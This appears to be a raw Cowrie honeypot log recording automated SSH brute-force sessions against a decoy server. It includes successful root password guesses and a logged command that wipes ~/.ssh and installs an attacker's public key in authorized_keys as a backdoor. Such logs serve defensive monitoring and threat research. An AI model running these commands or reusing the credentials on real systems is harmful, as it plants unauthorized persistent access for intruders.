{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:22:04.079195Z","src_ip":"212.227.235.229","session":"69b549efd978"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T18:22:04.079891Z","src_ip":"212.227.235.229","session":"69b549efd978"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:04.181106Z","src_ip":"212.227.235.229","session":"69b549efd978"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:04.182211Z","src_ip":"212.227.235.229","session":"69b549efd978"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:04.537365Z","src_ip":"80.94.95.15","session":"28c0dfbf8432"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58602,"dst_ip":"1.2.3.4","dst_port":22,"session":"6111a49df859","protocol":"ssh","message":"New connection: 212.227.235.229:58602 (1.2.3.4:22) [session: 6111a49df859]","sensor":"my-vps","timestamp":"2025-08-28T18:22:06.991860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:06.992908Z","src_ip":"212.227.235.229","session":"6111a49df859"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:07.115993Z","src_ip":"212.227.235.229","session":"6111a49df859"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32169,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcfc90501a54","protocol":"ssh","message":"New connection: 212.227.235.229:32169 (1.2.3.4:22) [session: dcfc90501a54]","sensor":"my-vps","timestamp":"2025-08-28T18:22:07.183566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_9.9","message":"Remote SSH version: SSH-2.0-OpenSSH_9.9","sensor":"my-vps","timestamp":"2025-08-28T18:22:07.351298Z","src_ip":"212.227.235.229","session":"dcfc90501a54"}
{"eventid":"cowrie.client.kex","hassh":"1cc79c7da9b5d5eead2c60983332a556","hasshAlgorithms":"sntrup761x25519-sha512,sntrup761x25519-sha512@openssh.com,mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["sntrup761x25519-sha512","sntrup761x25519-sha512@openssh.com","mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 1cc79c7da9b5d5eead2c60983332a556","sensor":"my-vps","timestamp":"2025-08-28T18:22:07.442783Z","src_ip":"212.227.235.229","session":"dcfc90501a54"}
{"eventid":"cowrie.login.success","username":"root","password":"yh123456.","message":"login attempt [root/yh123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:22:07.649944Z","src_ip":"212.227.235.229","session":"6111a49df859"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:22:07.914381Z","src_ip":"212.227.235.229","session":"6111a49df859"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:22:07.915122Z","src_ip":"212.227.235.229","session":"6111a49df859"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:22:07.915904Z","src_ip":"212.227.235.229","session":"6111a49df859"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:08.109267Z","src_ip":"212.227.235.229","session":"6111a49df859"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:22:08.415829Z","src_ip":"212.227.235.229","session":"6111a49df859"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:22:08.416593Z","src_ip":"212.227.235.229","session":"6111a49df859"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","sensor":"my-vps","timestamp":"2025-08-28T18:22:08.428433Z","src_ip":"212.227.235.229","session":"dcfc90501a54"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T18:22:08.428978Z","src_ip":"212.227.235.229","session":"dcfc90501a54"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:22:08.541674Z","src_ip":"212.227.235.229","session":"6111a49df859"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:08.542565Z","src_ip":"212.227.235.229","session":"6111a49df859"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42472,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b74e6d208d3","protocol":"ssh","message":"New connection: 212.227.235.229:42472 (1.2.3.4:22) [session: 6b74e6d208d3]","sensor":"my-vps","timestamp":"2025-08-28T18:22:08.727982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:08.729153Z","src_ip":"212.227.235.229","session":"6b74e6d208d3"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:22:08.736223Z","src_ip":"212.227.235.229","session":"dcfc90501a54"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:08.853217Z","src_ip":"212.227.235.229","session":"6b74e6d208d3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:22:09.380185Z","src_ip":"212.227.235.229","session":"6b74e6d208d3"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:10.507847Z","src_ip":"212.227.235.229","session":"6b74e6d208d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42474,"dst_ip":"1.2.3.4","dst_port":22,"session":"90473440be15","protocol":"ssh","message":"New connection: 212.227.235.229:42474 (1.2.3.4:22) [session: 90473440be15]","sensor":"my-vps","timestamp":"2025-08-28T18:22:10.628988Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:10.629660Z","src_ip":"212.227.235.229","session":"90473440be15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:10.752309Z","src_ip":"212.227.235.229","session":"90473440be15"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:22:11.416142Z","src_ip":"212.227.235.229","session":"90473440be15"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:11.546439Z","src_ip":"212.227.235.229","session":"6111a49df859"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:11.547321Z","src_ip":"212.227.235.229","session":"90473440be15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37723,"dst_ip":"1.2.3.4","dst_port":23,"session":"65abc61a41e5","protocol":"telnet","message":"New connection: 212.227.235.229:37723 (1.2.3.4:23) [session: 65abc61a41e5]","sensor":"my-vps","timestamp":"2025-08-28T18:22:13.526584Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50392,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a4706aad948","protocol":"ssh","message":"New connection: 212.227.235.229:50392 (1.2.3.4:22) [session: 4a4706aad948]","sensor":"my-vps","timestamp":"2025-08-28T18:22:15.966228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:15.967172Z","src_ip":"212.227.235.229","session":"4a4706aad948"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:22:16.225193Z","src_ip":"212.227.235.229","session":"4a4706aad948"}
{"eventid":"cowrie.login.success","username":"root","password":"q3xaDraz","message":"login attempt [root/q3xaDraz] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:22:17.303546Z","src_ip":"212.227.235.229","session":"4a4706aad948"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:22:17.844837Z","src_ip":"212.227.235.229","session":"4a4706aad948"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:22:17.845652Z","src_ip":"212.227.235.229","session":"4a4706aad948"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:22:17.846806Z","src_ip":"212.227.235.229","session":"4a4706aad948"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:18.106175Z","src_ip":"212.227.235.229","session":"4a4706aad948"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:22:18.682480Z","src_ip":"212.227.235.229","session":"4a4706aad948"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:22:18.683213Z","src_ip":"212.227.235.229","session":"4a4706aad948"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:22:18.944945Z","src_ip":"212.227.235.229","session":"4a4706aad948"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:22:18.945834Z","src_ip":"212.227.235.229","session":"4a4706aad948"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50400,"dst_ip":"1.2.3.4","dst_port":22,"session":"27c4d8a819d6","protocol":"ssh","message":"New connection: 212.227.235.229:50400 (1.2.3.4:22) [session: 27c4d8a819d6]","sensor":"my-vps","timestamp":"2025-08-28T18:22:19.226725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:22:19.227703Z","src_ip":"212.227.235.229","session":"27c4d8a819d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client 